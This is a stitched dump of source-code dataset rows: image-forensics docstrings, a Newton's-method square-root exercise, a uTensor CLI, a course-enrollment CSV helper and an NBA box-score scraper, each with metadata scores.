'HH:MM:SS.FFF' #self.names = [] #TODO: check names, what else #TODO: check names, what else Open and return an image from the file. If the file is a video, find the first non-uniform frame. videoFrameTime, integer time in milliseconds, is provided, then find the frame after that point in time preserveSnapshot, False by default, informs the function to save the frame image after extraction for videos :param mask: :param img1: :param img2: :param invert: :param arguments: :return: @type mask: ImageWrapper @type img2: ImageWrapper @type img1: ImageWrapper Produce a intensity_map that redistributes the intensity values found in the edge_map evenly over 1 to 255 :param edge_map contains a map between an edge identifier (s,e) and an intensity value from 1 to 255 and possibly a color :return map of intensity value from edge map to a replacement intensity value @type edge_map {(str,str): (int,[])} #im = np.zeros((500,500,3)).astype('uint8') #pos = 0 #for i in intensity_map: # im[pos,:] = i # pos+=1 #ImageWrapper(im).save('foo.png') Create a new image setting all white to the color and all black to white. :param img: :param color: :return: @type img: ImageWrapper @rtype ImageWrapper Produce an image that changes gray scale to color. First, set the intensity values of each pixel using the intensity value from the intensity map Then use a color map to build a color image Then repopulate the edge_map with the assigned color for each edge :param img gray scale image :param intensity_map intensity value mapped to its replacement :return the new color image Convert to a mask with white indicating change :param img gray scale image :return image Determine if operation is global. Capture 'change size ratio' and 'change size category'. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Non-global operations, capturing 'change size ratio' and 'change size category'. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Perform SIFT regardless of the global change status, using an input mask from the parameters to select the source region. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: parameters :return: # a bit arbitrary. If there is a less than 50% overlap, then isolate the regions highlighted by the inputmask # otherwise just use the change mask for the transform. The change mask should be the full set of the pixels # changed and the input mask a subset of those pixels # want mask2 to be the region moved to # mask1 to be the region moved from Perform SIFT regardless of the global change status. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :return: Perform SIFT regardless of the global change status. If neighbor mask is is constructed, indicating the seams can be calculated, then mark as not Global. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: If the image is rotated by values other than factors of 90 degrees, use SIFT to build a homography. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: # global case and not a factor of 90 # skip video Use SIFT to build a homography for transform type changes that manipulated prior masks for probes. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Assume opacity is o such that outputImg = initialImage*(mask/255) + initialImage*((255-mask)/255)*(1-o) + donorImage*o*((255-donormask)/255) IM = inverted mask IDM = inverted donor mask outputImg - initialImage*(mask/255) = initialImage*IM - initialImage*IM*o + donorImage*o*((255-donormask)/255) outputImg - initialImage*(mask/255) - initialImage*IM = donorImage*IDM*o - initialImage*IM*o outputImg - initialImage = donorImage*IDM*o - initialImage*IM*o outputImg - initialImage = o * (donorImage*IDM - initialImage*IM) o = (outputImg - initialImage)/(donorImage*IDM - initialImage*IM) Challenging since the donor mask is not lined up the image exactly. :param img1: :param img2: :param outputImg: :param mask: :return: # r = i(1-o) + t*o # r = i - o*i + t*o # r-i = o*t - o*i # r-i= o(t-i) # o = (r-i)/(t-i) If 'location change' is not in parameters or 'location change' is no, skip tis step. Otherwise, use SIFT to find a homography. :param analysis: :param img1: :param img2: :param mask: :param linktype: :param arguments: :param directory: :return: Divided up the size into segment_size ranges :param size: :param segment_size: :return: list of ranges as representd by tuples(start,end, last range indicator) Filter out points outside the 'window' surrounded by the buffer :param pt: :param xstart: :param xend: :param ystart: :param yend: :return: # store all the good matches as per Lowe's ratio test. # remove remaps outside the mask # fix nan's with no mapping Compute sparse maps from points between img1 to img2 :param img1: :param img2: :param mask1: :param mask2: @type img1: ImageWrapper @type img2: ImageWrapper :return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix # r = np.zeros(r.shape).astype('uint8') # for x in range(len(src_dts_pts[1])): # cv2.line(r,tuple(src_dts_pts[0][x][0]),tuple(src_dts_pts[1][x][0]),255) # r[int(x[0][1]),int(x[0][0])] = 255 Compute homography to transfrom img1 to img2 Apply the mask to each in order to only compare relevent regions of images :param img1: :param img2: :param mask1: :param mask2: @type img1: ImageWrapper @type img2: ImageWrapper :return: None if a matrix cannot be constructed, otherwise a 3x3 transform matrix # need as many as possible Resize the composite mask :param compositeMask: :param transform_matrix: :return: :param alist :param blist: :return: Since SIFT Cannot flip Flip the selected area :param compositeMask: :param mask: :param flip: :return: Loop through each level add apply the function. Need to convert levels to 0 and unmapped levels to 255 :param compositeMask: :param mask: :param transform_matrix: :return: Loop through each level add apply SIFT to transform the mask :param compositeMask: :param mask: :param transform_matrix: :return: @type destIm: ImageWrapper @type startIm: ImageWrapper Loop through each level add apply the rotation. Need to convert levels to 0 and unmapped levels to 255 :param img: :param angle: :param pivot: :return: Loop through each level add apply the transform. Need to convert levels to 0 and unmapped levels to 255 :param compositeMask: :param mask: :param transform_matrix: :return: Loop through each level add apply the rotation. Need to convert levels to 0 and unmapped levels to 255 :param rotation: :param compositeMask: :param edgeMask: :param expectedDims: :param local :return: # convert cornore to homogenous coordinates # convert points to lines # find point of intersection # find point of intersection # if the resulting lines intersect inside the box, fail # Or is more appropriate to look at the hull of the shape. # point = Point(x,y) # points = [(d[0] / d[2], d[1] / d[2]) for d in [a_ll,a_ul,a_ur,a_lr]] ##polygon = Polygon(points).convex_hull # return not polygon.contains(point) Ceate a new mask applying the transform to only those parts of the compositeMask that overlay with the provided mask. :param compositeMask: :param mask: 255 for unmanipulated pixels :param transform_matrix: :param invert: :param returnRaw: do merge back in the composite :return: # +cv2.CV_WARP_FILL_OUTLIERS # resize only occurs by user error. # zeros out areas outside the mask # put the areas outside the mask back into the composite # that L[i][j] contains length of LCS of X[0..i-1] and Y[0..j-1] # Start from the right-most-bottom-most corner and # one by one store characters in lcs[] # If not same, then find the larger of two and # go in the direction of larger value # set to black if less than threshold # filter out noise in the mask # compute diff in 3 colors # use the biggest difference of the 3 colors # smooth out the histogram # find local minima # if there was no minima, hardcode # Use first minima # set to black if less than threshold # filter out noise in the mask # assumes crop, but this approach should be improved to use HOG comparisons # since some of these conversions occur with Raw images # see if there is crop information in exif #keep in mind that alterMask, used for composite generation, assumes 'crop' occurs first, followed # by final adjustments for size :param img1: :param img2: :param invert: :param arguments: :param alternativeFunction: :param convertFunction: :return: @type img1_wrapper: ImageWrapper @type img2_wrapper: ImageWrapper @type arguments: dict @rtype numpy.ndarray,dict # rotate image two if possible to compare back to image one. # The mask is not perfect. # res = __resize(mask,(max(img2.shape[0],img1.shape[0]), max(img2.shape[1],img1.shape[1]))) # res[res<0.00001] = 0 # res[res>0] = 255 # # now crop out the rotation difference, to make sure the original image is not modified # if img1.shape != res.shape: # diff = (res.shape[0]-img1.shape[0], res.shape[1]-img1.shape[1]) # diff = (diff[0] if diff[0] > 0 else 0, diff[1] if diff[1] > 0 else 0) # res = res[diff[0]/2:res.shape[0]-((diff[0]/2) -diff[0]),diff[1]/2:res.shape[1]-((diff[1]/2) - diff[1])] If rawimg2 has an alpha channel, then the pixels then the high alpha value is the pixels that did not change :param rawimg1: :param rawimg2: :return: :param rawimg1: :param rawimg2: :param equalize_colors: :return: @type rawimg1: ImageWrapper @type rawimg2: ImageWrapper Return a tuple describing the bounding box (xl,xh,yl,yh) with the most likely match to the small image. Return a masking where img1 is bigger than img2 and img2 is likely a crop of img1. images are 16 bit unnsigned or floating point. @return change mask aligned to in img1 dimensions, dictionary of analysis keys @type img1: np.array @type img2: np.array :param changemask: :param startimage: :param finalimage: :return: @type changemask: ImageWrapper @type startimage: ImageWrapper @type finalimage: ImageWrapper Return a masking where img1 is smaller than img2 and img2 contains img1. z1 and z2 are expected to be PIL images # size is inverted due to Image's opposite of numpy arrays Takes an image and produce a mask where all black areas are white Trim a mask after seam carving :param image: :param mask: :param expectedSize: :return: # rotation may change the shape # transforms typical are created for local operations (not entire image) # inverse crop # if transform matrix provided and alternate path is taken above # if we are cutting, then do not want to use the edge mask as mask for transformation. # see the cut section below, where the transform occurs directly on the mask # this occurs in donor cases # inverse crop # res is the donor mask # edgeMask may be the overriding mask from a PasteSplice, thus in the same shape # The transfrom will convert to the target mask size of the donor path. # need to use target size since the expected does ot align with the donor paths. Performs same functionality as convertToMask, but takes and returns np array # population covariance to match Wang et. al. 2004 # compute (weighted) means # compute (weighted) variances and covariances # compute (weighted) mean of ssim project gray into Green :param maskprefix: :param starttime: :param suffix: :return: A mask file name using the provided components # group selection # frame selection in group (relative to start of group) # the smart numpy array # where to stop :return: @rtype: GrayBlockWriter :param filename: :param start_frame: :param start_time: :param end_frame: optional stopping point :return: @type filename: str @rtype: GrayBlockReader :param reader: :return: @type reader: GrayBlockReader @rtype: GrayBlockWriter Multiple Mask Segment per HDF5 File, one in each group. :param start_frame: :param start_time: :return: @type reader: GrayBlockReader :param reader: :param grp_no: :param start_frame: :param start_time: :param end_frame: determine end frame :return: One Mask Segment per HDF5 File. :param start_frame: :param start_time: :return: @type reader: GrayBlockReader #write blanks for the rest #clean up the mask file, leave the finished overlay Write Gray scale (Mask) images to a compressed block file Either build the Writer or the Validator Compare frames of two video masks to see if one is valid. #ffwd to where we want to be Write Gray scale (Mask) video images #write all the frames up to and including the mask frame #refigure time for the frame we actually write #date_time_stamp = exifdata['Create Date'] if 'Create Date' in exifdata else exifdata['File Creation Date/Time'] #nonmatches.append(e) | 1.844017 | 2 |
Listas de Python/Lista 3/EX03.py | 4RandomProgrammer/Python | 0 | 6616729 | #EX03L03
#Inputs
numinteracoes = int(input())
#var
kraiz = 0
k = 1
i = 0
j = 0
while i < numinteracoes:
q = float(input())
while j < 10:
kraiz = (k + q/k)/2
k = kraiz
j += 1
print(round(kraiz,2))
i += 1
j = 0
kraiz = 0
k = 1
| #EX03L03
#Inputs
numinteracoes = int(input())
#var
kraiz = 0
k = 1
i = 0
j = 0
while i < numinteracoes:
q = float(input())
while j < 10:
kraiz = (k + q/k)/2
k = kraiz
j += 1
print(round(kraiz,2))
i += 1
j = 0
kraiz = 0
k = 1
| en | 0.144521 | #EX03L03 #Inputs #var | 3.338872 | 3 |
utensor_cgen/cli/backend.py | uTensor/utensor_cgen | 49 | 6616730 | import os
from pprint import pformat
import click
from utensor_cgen import __version__
from utensor_cgen.api.backend import generate_config as _generate_config
from utensor_cgen.api.backend import get_backends, get_trans_methods
from utensor_cgen.backend.api import BackendManager
from .main import cli
@cli.command(name='list-backends', help='list all available backends')
@click.help_option('-h', '--help')
def list_backends():
backends = get_backends()
click.secho('Available backends:', fg='green', bold=True)
for backend in backends:
click.secho(
' - {}'.format(backend), fg='green'
)
return 0
@cli.command(name='list-trans-methods', help='list all available graph transformation')
@click.help_option('-h', '--help')
@click.option('--verbose', is_flag=True)
def list_trans_methods(verbose):
from pprint import pformat
trans_methods = get_trans_methods()
if verbose:
for name, trans_cls in trans_methods.items():
click.secho(name, fg='white', bold=True)
click.secho(trans_cls.__doc__, fg='yellow', bold=True)
else:
click.secho(
pformat(list(trans_methods.keys())),
fg='white', bold=True
)
return 0
@cli.command(name='list-support-ops', help='list all supported op in the backend')
@click.help_option('-h', '--help')
@click.option('--target', default='utensor', show_default=True)
@click.option('--config', default='utensor_cli.toml', show_default=True)
def list_support_ops(target, config):
from utensor_cgen.backend.api import BackendManager
if os.path.exists(config):
backend = BackendManager.get_backend(target).from_file(config)
else:
backend = BackendManager.get_backend(target)({})
click.secho(
pformat(backend.support_ops),
fg='white',
bold=True
)
@cli.command(name='generate-config', help='generate config toml file')
@click.help_option('-h', '--help')
@click.option('--target', required=True, help='target framework/platform')
@click.option('-o', '--output', default='utensor_cli.toml', metavar='CONFIG.toml', help='the output config file name')
def generate_config(target, output):
_generate_config(target, output)
click.secho(
'config file generated: {}'.format(output),
fg='white',
bold=True,
)
return 0
| import os
from pprint import pformat
import click
from utensor_cgen import __version__
from utensor_cgen.api.backend import generate_config as _generate_config
from utensor_cgen.api.backend import get_backends, get_trans_methods
from utensor_cgen.backend.api import BackendManager
from .main import cli
@cli.command(name='list-backends', help='list all available backends')
@click.help_option('-h', '--help')
def list_backends():
backends = get_backends()
click.secho('Available backends:', fg='green', bold=True)
for backend in backends:
click.secho(
' - {}'.format(backend), fg='green'
)
return 0
@cli.command(name='list-trans-methods', help='list all available graph transformation')
@click.help_option('-h', '--help')
@click.option('--verbose', is_flag=True)
def list_trans_methods(verbose):
from pprint import pformat
trans_methods = get_trans_methods()
if verbose:
for name, trans_cls in trans_methods.items():
click.secho(name, fg='white', bold=True)
click.secho(trans_cls.__doc__, fg='yellow', bold=True)
else:
click.secho(
pformat(list(trans_methods.keys())),
fg='white', bold=True
)
return 0
@cli.command(name='list-support-ops', help='list all supported op in the backend')
@click.help_option('-h', '--help')
@click.option('--target', default='utensor', show_default=True)
@click.option('--config', default='utensor_cli.toml', show_default=True)
def list_support_ops(target, config):
from utensor_cgen.backend.api import BackendManager
if os.path.exists(config):
backend = BackendManager.get_backend(target).from_file(config)
else:
backend = BackendManager.get_backend(target)({})
click.secho(
pformat(backend.support_ops),
fg='white',
bold=True
)
@cli.command(name='generate-config', help='generate config toml file')
@click.help_option('-h', '--help')
@click.option('--target', required=True, help='target framework/platform')
@click.option('-o', '--output', default='utensor_cli.toml', metavar='CONFIG.toml', help='the output config file name')
def generate_config(target, output):
_generate_config(target, output)
click.secho(
'config file generated: {}'.format(output),
fg='white',
bold=True,
)
return 0
| none | 1 | 2.102242 | 2 | |
src/main/python/classData/course_enrollment.py | jimwaldo/HarvardX-Tools | 3 | 6616731 | #!/usr/bin/env python
"""
Object definition and utility functions for the course enrollment file
Contains a definition of the course_enrollment object, that holds all of the
information found in the course enrollment file. There is a function that will
build a dictionary, keyed by user id, that holds the information. There is also
a function that will scrub badly-formed entries from the file.
Created on Mar 17, 2013
@author: waldo
"""
import logging
#from convertfiles import xmltocsv
class course_enrollment(object):
"""
A representation of the state kept concerning a student's enrollment
This object encapsulates the time of enrollment for a student. There isn't
much here other than the student id, the course id, and the date of enrollment
"""
def __init__(self, uid, course_id, enroll_d):
"""
Constructor for an object containing the enrollment state
Note that the id that is only relevant within the file is not part of this
object.
"""
self.uid = uid
self.course_id = course_id
self.enroll_d = enroll_d
def builddict(f):
"""
Build a dictionary of the enrollment date for a student
The dictionary that is returned by this function is indexed by student id.
The internal id that is stored in the raw data file is dropped, as it has no
meaning outside of this file.
Parameters
-----------
f: csv.reader
An open csv reader object that contains the course enrollment data
"""
retdict = {}
lineno = 0
for line in f:
lineno += 1
if len(line) != 4:
logging.warning('bad row size at line ' + str(lineno))
continue
[oid, user_id, course_id, enrolld] = line
rec = course_enrollment(user_id, course_id, enrolld)
retdict[user_id] = rec
return retdict
def readdict(fin):
"""
Reconstruct a dictionary or enrollment information from an open .csv file previously created by writedict
Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates
a dictionary containing that enrollment data. Input is a csv.reader object.
Returns a dictionary, indexed by user id, where each line is a course enrollment object.
"""
retDict = {}
fin.next()
for [uid, cid, edate] in fin:
retDict[uid] = course_enrollment(uid, cid, edate)
return retDict
def writedict(fout, pDict):
"""
Save a dictionary or enrollment data to an open .csv file, to be written by readdict
Writes the contents of a course enrollment dictionary to an open csv file. The file will have
a human-readable header placed on it that will need to be skipped on reading.
"""
fout.writerow(['User id', 'Course id', 'Enrollment date'])
for u in iter(pDict):
fout.writerow([u, pDict[u].course_id, pDict[u].enroll_d])
# def scrubstate(f1, f2):
# """
# Clean up the state of a course enrollment csv file
#
# Reads through a csv file containing the course enrollment data, removing any
# lines that are of the wrong size. Produces a scrubbed csv file
#
# Parameters
# --------------
# f1: csv reader
# An open csv reader, containing the data to be cleaned up
# f2: csv writer
# An open csv writer, that will take all of the lines of the right
# size
# """
#
# xmltocsv.scrubcsv(f1, f2, 4)
| #!/usr/bin/env python
"""
Object definition and utility functions for the course enrollment file
Contains a definition of the course_enrollment object, that holds all of the
information found in the course enrollment file. There is a function that will
build a dictionary, keyed by user id, that holds the information. There is also
a function that will scrub badly-formed entries from the file.
Created on Mar 17, 2013
@author: waldo
"""
import logging
#from convertfiles import xmltocsv
class course_enrollment(object):
"""
A representation of the state kept concerning a student's enrollment
This object encapsulates the time of enrollment for a student. There isn't
much here other than the student id, the course id, and the date of enrollment
"""
def __init__(self, uid, course_id, enroll_d):
"""
Constructor for an object containing the enrollment state
Note that the id that is only relevant within the file is not part of this
object.
"""
self.uid = uid
self.course_id = course_id
self.enroll_d = enroll_d
def builddict(f):
"""
Build a dictionary of the enrollment date for a student
The dictionary that is returned by this function is indexed by student id.
The internal id that is stored in the raw data file is dropped, as it has no
meaning outside of this file.
Parameters
-----------
f: csv.reader
An open csv reader object that contains the course enrollment data
"""
retdict = {}
lineno = 0
for line in f:
lineno += 1
if len(line) != 4:
logging.warning('bad row size at line ' + str(lineno))
continue
[oid, user_id, course_id, enrolld] = line
rec = course_enrollment(user_id, course_id, enrolld)
retdict[user_id] = rec
return retdict
def readdict(fin):
"""
Reconstruct a dictionary or enrollment information from an open .csv file previously created by writedict
Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates
a dictionary containing that enrollment data. Input is a csv.reader object.
Returns a dictionary, indexed by user id, where each line is a course enrollment object.
"""
retDict = {}
fin.next()
for [uid, cid, edate] in fin:
retDict[uid] = course_enrollment(uid, cid, edate)
return retDict
def writedict(fout, pDict):
"""
Save a dictionary or enrollment data to an open .csv file, to be written by readdict
Writes the contents of a course enrollment dictionary to an open csv file. The file will have
a human-readable header placed on it that will need to be skipped on reading.
"""
fout.writerow(['User id', 'Course id', 'Enrollment date'])
for u in iter(pDict):
fout.writerow([u, pDict[u].course_id, pDict[u].enroll_d])
# def scrubstate(f1, f2):
# """
# Clean up the state of a course enrollment csv file
#
# Reads through a csv file containing the course enrollment data, removing any
# lines that are of the wrong size. Produces a scrubbed csv file
#
# Parameters
# --------------
# f1: csv reader
# An open csv reader, containing the data to be cleaned up
# f2: csv writer
# An open csv writer, that will take all of the lines of the right
# size
# """
#
# xmltocsv.scrubcsv(f1, f2, 4)
| en | 0.921489 | #!/usr/bin/env python Object definition and utility functions for the course enrollment file Contains a definition of the course_enrollment object, that holds all of the information found in the course enrollment file. There is a function that will build a dictionary, keyed by user id, that holds the information. There is also a function that will scrub badly-formed entries from the file. Created on Mar 17, 2013 @author: waldo #from convertfiles import xmltocsv A representation of the state kept concerning a student's enrollment This object encapsulates the time of enrollment for a student. There isn't much here other than the student id, the course id, and the date of enrollment Constructor for an object containing the enrollment state Note that the id that is only relevant within the file is not part of this object. Build a dictionary of the enrollment date for a student The dictionary that is returned by this function is indexed by student id. The internal id that is stored in the raw data file is dropped, as it has no meaning outside of this file. Parameters ----------- f: csv.reader An open csv reader object that contains the course enrollment data Reconstruct a dictionary or enrollment information from an open .csv file previously created by writedict Reads the contents of a csv file containing the dump of a course enrollment dictionary, and creates a dictionary containing that enrollment data. Input is a csv.reader object. Returns a dictionary, indexed by user id, where each line is a course enrollment object. Save a dictionary or enrollment data to an open .csv file, to be written by readdict Writes the contents of a course enrollment dictionary to an open csv file. The file will have a human-readable header placed on it that will need to be skipped on reading. # def scrubstate(f1, f2): # """ # Clean up the state of a course enrollment csv file # # Reads through a csv file containing the course enrollment data, removing any # lines that are of the wrong size. Produces a scrubbed csv file # # Parameters # -------------- # f1: csv reader # An open csv reader, containing the data to be cleaned up # f2: csv writer # An open csv writer, that will take all of the lines of the right # size # """ # # xmltocsv.scrubcsv(f1, f2, 4) | 3.438041 | 3 |
grabstats/box_score.py | kndo/grabstats | 0 | 6616732 | """
"""
import os
from bs4 import BeautifulSoup
import pandas as pd
import requests
def _get_data_stat(row, data_stat, is_header=False):
if is_header:
return row.find('th', {'data-stat': data_stat}).text
return row.find('td', {'data-stat': data_stat}).text
def format_time(mp):
"""Convert minutes played from analog time to digital time.
:param str mp: minutes played, e.g. '24:30'
:return int: e.g. 24.5
"""
(m, s) = mp.split(':')
digital = int(m) + int(s) / 60
return round(digital, 1)
class BoxScore:
def __init__(self, soup):
self.soup = soup
def get(self, team_name):
box_score = pd.DataFrame()
table = self.soup.find('table', {'id': f'box_{team_name}_{self.box_score_type}'})
rows = table.find('tbody').find_all('tr')
player_rows = [row for row in rows if row.td]
active_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'mp']
inactive_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'reason']
for data_stat in self.data_stats:
if data_stat == 'player':
is_header = True
else:
is_header = False
box_score[data_stat] = [_get_data_stat(row, data_stat, is_header)
for row in active_player_rows]
box_score['mp'] = box_score['mp'].apply(format_time)
return box_score
class BasicBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'basic'
self.data_stats = [
'player', 'mp',
'fg', 'fga', 'fg_pct',
# 'fg3', 'fg3a', 'fg3_pct',
# 'ft', 'fta', 'ft_pct',
# 'orb', 'drb', 'trb',
# 'ast', 'stl', 'blk',
# 'tov', 'pf',
'pts',
'plus_minus',
]
class AdvBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'advanced'
self.data_stats = [
'player', 'mp',
# 'ts_pct', 'efg_pct',
# 'fg3a_per_fga_pct', 'fta_per_fga_pct',
# 'orb_pct', 'drb_pct', 'trb_pct',
# 'ast_pct', 'stl_pct', 'blk_pct',
'tov_pct', 'usg_pct',
'off_rtg', 'def_rtg',
]
def box_scores_get_one(team_name, url):
"""Get the basic and advanced box scores for one team and one game.
:param str team_name: the capitalized abbreviated name, e.g. 'DEN'
:param str url: the URL to the box score page on basketball-reference.com
"""
page = requests.get(url).text
soup = BeautifulSoup(page, 'lxml')
basic = BasicBoxScore(soup).get(team_name.lower())
adv = AdvBoxScore(soup).get(team_name.lower())
basic['usg_pct'] = adv['usg_pct']
return basic, adv
def box_scores_get_many(schedule):
"""
:param pd.DataFrame schedule: contains game info for the schedule of games
:return tuple: to be finished ...
"""
basic_box_scores = []
adv_box_scores = []
for idx, row in schedule.iterrows():
game_date = row['DATE']
road_team_abbr = row['ROAD_TEAM_ABBR']
home_team_abbr = row['HOME_TEAM_ABBR']
box_score_url = row['BOX_SCORE_URL']
road_basic, road_adv = box_scores_get_one(road_team_abbr, box_score_url)
home_basic, home_adv = box_scores_get_one(home_team_abbr, box_score_url)
# BASIC BOX SCORE
# Road team
road_basic['DATE'] = game_date
road_basic['OWN_TEAM'] = road_team_abbr
road_basic['OPP_TEAM'] = home_team_abbr
road_basic['VENUE'] = 'R'
# Home team
home_basic['DATE'] = game_date
home_basic['OWN_TEAM'] = home_team_abbr
home_basic['OPP_TEAM'] = road_team_abbr
home_basic['VENUE'] = 'H'
basic = pd.concat([road_basic, home_basic])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%',
# 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS',
# '+/-', 'USG%', 'PACE'
# ]
# basic = basic[reordered_cols]
basic_box_scores.append(basic)
# ADVANCED BOX SCORE
# Road team
road_adv['DATE'] = game_date
road_adv['OWN_TEAM'] = road_team_abbr
road_adv['OPP_TEAM'] = home_team_abbr
road_adv['VENUE'] = 'R'
# Home team
home_adv['DATE'] = game_date
home_adv['OWN_TEAM'] = home_team_abbr
home_adv['OPP_TEAM'] = road_team_abbr
home_adv['VENUE'] = 'H'
adv = pd.concat([road_adv, home_adv])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%',
# 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg'
# ]
# adv = adv[reordered_cols]
adv_box_scores.append(adv)
return basic_box_scores, adv_box_scores
def to_csv(box_score, outfile):
if os.path.isfile(outfile):
header = False
header = True
with open(outfile, 'a') as f:
box_score.to_csv(f, header=header, index=False) | """
"""
import os
from bs4 import BeautifulSoup
import pandas as pd
import requests
def _get_data_stat(row, data_stat, is_header=False):
if is_header:
return row.find('th', {'data-stat': data_stat}).text
return row.find('td', {'data-stat': data_stat}).text
def format_time(mp):
"""Convert minutes played from analog time to digital time.
:param str mp: minutes played, e.g. '24:30'
:return int: e.g. 24.5
"""
(m, s) = mp.split(':')
digital = int(m) + int(s) / 60
return round(digital, 1)
class BoxScore:
def __init__(self, soup):
self.soup = soup
def get(self, team_name):
box_score = pd.DataFrame()
table = self.soup.find('table', {'id': f'box_{team_name}_{self.box_score_type}'})
rows = table.find('tbody').find_all('tr')
player_rows = [row for row in rows if row.td]
active_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'mp']
inactive_player_rows = [row for row in player_rows
if row.td.get('data-stat') == 'reason']
for data_stat in self.data_stats:
if data_stat == 'player':
is_header = True
else:
is_header = False
box_score[data_stat] = [_get_data_stat(row, data_stat, is_header)
for row in active_player_rows]
box_score['mp'] = box_score['mp'].apply(format_time)
return box_score
class BasicBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'basic'
self.data_stats = [
'player', 'mp',
'fg', 'fga', 'fg_pct',
# 'fg3', 'fg3a', 'fg3_pct',
# 'ft', 'fta', 'ft_pct',
# 'orb', 'drb', 'trb',
# 'ast', 'stl', 'blk',
# 'tov', 'pf',
'pts',
'plus_minus',
]
class AdvBoxScore(BoxScore):
def __init__(self, soup):
super().__init__(soup)
self.box_score_type = 'advanced'
self.data_stats = [
'player', 'mp',
# 'ts_pct', 'efg_pct',
# 'fg3a_per_fga_pct', 'fta_per_fga_pct',
# 'orb_pct', 'drb_pct', 'trb_pct',
# 'ast_pct', 'stl_pct', 'blk_pct',
'tov_pct', 'usg_pct',
'off_rtg', 'def_rtg',
]
def box_scores_get_one(team_name, url):
"""Get the basic and advanced box scores for one team and one game.
:param str team_name: the capitalized abbreviated name, e.g. 'DEN'
:param str url: the URL to the box score page on basketball-reference.com
"""
page = requests.get(url).text
soup = BeautifulSoup(page, 'lxml')
basic = BasicBoxScore(soup).get(team_name.lower())
adv = AdvBoxScore(soup).get(team_name.lower())
basic['usg_pct'] = adv['usg_pct']
return basic, adv
def box_scores_get_many(schedule):
"""
:param pd.DataFrame schedule: contains game info for the schedule of games
:return tuple: to be finished ...
"""
basic_box_scores = []
adv_box_scores = []
for idx, row in schedule.iterrows():
game_date = row['DATE']
road_team_abbr = row['ROAD_TEAM_ABBR']
home_team_abbr = row['HOME_TEAM_ABBR']
box_score_url = row['BOX_SCORE_URL']
road_basic, road_adv = box_scores_get_one(road_team_abbr, box_score_url)
home_basic, home_adv = box_scores_get_one(home_team_abbr, box_score_url)
# BASIC BOX SCORE
# Road team
road_basic['DATE'] = game_date
road_basic['OWN_TEAM'] = road_team_abbr
road_basic['OPP_TEAM'] = home_team_abbr
road_basic['VENUE'] = 'R'
# Home team
home_basic['DATE'] = game_date
home_basic['OWN_TEAM'] = home_team_abbr
home_basic['OPP_TEAM'] = road_team_abbr
home_basic['VENUE'] = 'H'
basic = pd.concat([road_basic, home_basic])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%',
# 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS',
# '+/-', 'USG%', 'PACE'
# ]
# basic = basic[reordered_cols]
basic_box_scores.append(basic)
# ADVANCED BOX SCORE
# Road team
road_adv['DATE'] = game_date
road_adv['OWN_TEAM'] = road_team_abbr
road_adv['OPP_TEAM'] = home_team_abbr
road_adv['VENUE'] = 'R'
# Home team
home_adv['DATE'] = game_date
home_adv['OWN_TEAM'] = home_team_abbr
home_adv['OPP_TEAM'] = road_team_abbr
home_adv['VENUE'] = 'H'
adv = pd.concat([road_adv, home_adv])
# reordered_cols = [
# 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP',
# 'TS%', 'eFG%', '3PAr', 'FTr', 'ORB%', 'DRB%', 'TRB%', 'AST%',
# 'STL%', 'BLK%', 'TOV%', 'USG%', 'ORtg', 'DRtg'
# ]
# adv = adv[reordered_cols]
adv_box_scores.append(adv)
return basic_box_scores, adv_box_scores
def to_csv(box_score, outfile):
if os.path.isfile(outfile):
header = False
header = True
with open(outfile, 'a') as f:
box_score.to_csv(f, header=header, index=False) | en | 0.403194 | Convert minutes played from analog time to digital time. :param str mp: minutes played, e.g. '24:30' :return int: e.g. 24.5 # 'fg3', 'fg3a', 'fg3_pct', # 'ft', 'fta', 'ft_pct', # 'orb', 'drb', 'trb', # 'ast', 'stl', 'blk', # 'tov', 'pf', # 'ts_pct', 'efg_pct', # 'fg3a_per_fga_pct', 'fta_per_fga_pct', # 'orb_pct', 'drb_pct', 'trb_pct', # 'ast_pct', 'stl_pct', 'blk_pct', Get the basic and advanced box scores for one team and one game. :param str team_name: the capitalized abbreviated name, e.g. 'DEN' :param str url: the URL to the box score page on basketball-reference.com :param pd.DataFrame schedule: contains game info for the schedule of games :return tuple: to be finished ... # BASIC BOX SCORE # Road team # Home team # reordered_cols = [ # 'DATE', 'PLAYER_NAME', 'OWN_TEAM', 'OPP_TEAM', 'VENUE', 'MP', # 'FG', 'FGA', 'FG%', '3P', '3PA', '3P%', 'FT', 'FTA', 'FT%', # 'ORB', 'DRB', 'TRB', 'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS', # '+/-', 'USG%', 'PACE' # ] # basic = basic[reordered_cols] # ADVANCED BOX SCORE # Road team # Home team # reordered_cols = [ # 